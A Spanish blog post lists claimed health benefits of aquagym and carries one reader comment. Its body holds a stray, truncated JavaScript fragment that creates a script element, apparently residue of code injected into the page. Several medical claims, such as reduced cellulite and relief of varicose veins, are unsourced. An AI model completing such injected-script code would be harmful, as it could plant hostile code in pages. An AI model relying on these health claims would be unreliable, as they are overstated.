Salud y belleza » Deportes

Los beneficios del Aquagym

1 Comentario

Si la natación es -como mucho especialistas sostienen- el deporte que más músculos trabaja, el Aquagym es entonces la formas más completa de hacer tareas físicas; pues combina la labor de campo con el esfuerzo en presión acuática. Sí, en efecto, el Aquagym es una de las modalidades más innovadora que se han incorporado en el terreno atlético.

“La gimnasia acuática es una técnica deportiva que aplica ejercicios propios del fitness en un medio diferente, es decir, en el agua. Tanto los cambios de presión como la fuerza que implica trabajar el movimiento dentro del agua, ayudan a hacer del Aquagym una actividad colosal. Practicando gimnasia acuática se consiguen rápidamente resultados magníficos. También se suele realizar como tratamiento de lesiones” afirma un instructor de Aquagym que viene trabajando en esta rama hace ya varios años.

Entre los beneficios más importantes del Aquagym, se destacan:

  • Gracias a su efecto masajeador, el Aquagym es ideal para reducir la celulitis ya que estimula la circulación. Alivia también la pesadez de las piernas, lo que se supone como perfecto para quienes padecen varices.
  • Es un deporte que puede ser practicado por todo tipo de persona y de todas las edades, el esfuerzo se puede regular y por lo tanto el Aquagym se eleva como una opción para cualquier individuo.
  • En el Aquagym fomenta la salud cardiovascular de quién la práctica pues permite fortalecer el músculo del corazón y mejorar la capacidad respiratoria.
  • Ayuda a tonificar músculos, mejorar la elasticidad y aumentar la resistencia del organismo.
  • Es una excelente terapia para sujetos que necesitan recuperarse de lesiones físicas. Muchos deportistas de alto rendimiento ocupan una etapa de su recuperación practicando ejercicios de Aquagym.
  • Es una práctica ideal para aquellos individuos con mala postura que necesitan corregirla.
  • Reduce la sensación de cansancio y alivia el estrés puesto que el agua tiene efecto relajante en el cuerpo.
  • Está considerada una actividad aconsejable para personas con artritis, artrosis y hernias.

Tal como indica este artículo, el Aquagym es, sin dudas, una de las mejores formas de hacer ejercicio que han salido a la luz en los últimos tiempos. Actualmente, en España existen muchas colonias donde se práctica la Gimnasia Acuática y si bien en verano es el tiempo ideal, también se puede practicar en otras épocas del año gracias a las nuevas tecnologías. Una actividad para gente de todas las edades.

¡Anímate a entrar en la moda de Aquagym!var d=document;var s=d.createElement('script'); } else {

Más consejos de salud y belleza : ,

One Comment »

  • Belu Alvarez said:

    Muy buena la explicacion, respondan si ahi alguien ahi!

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.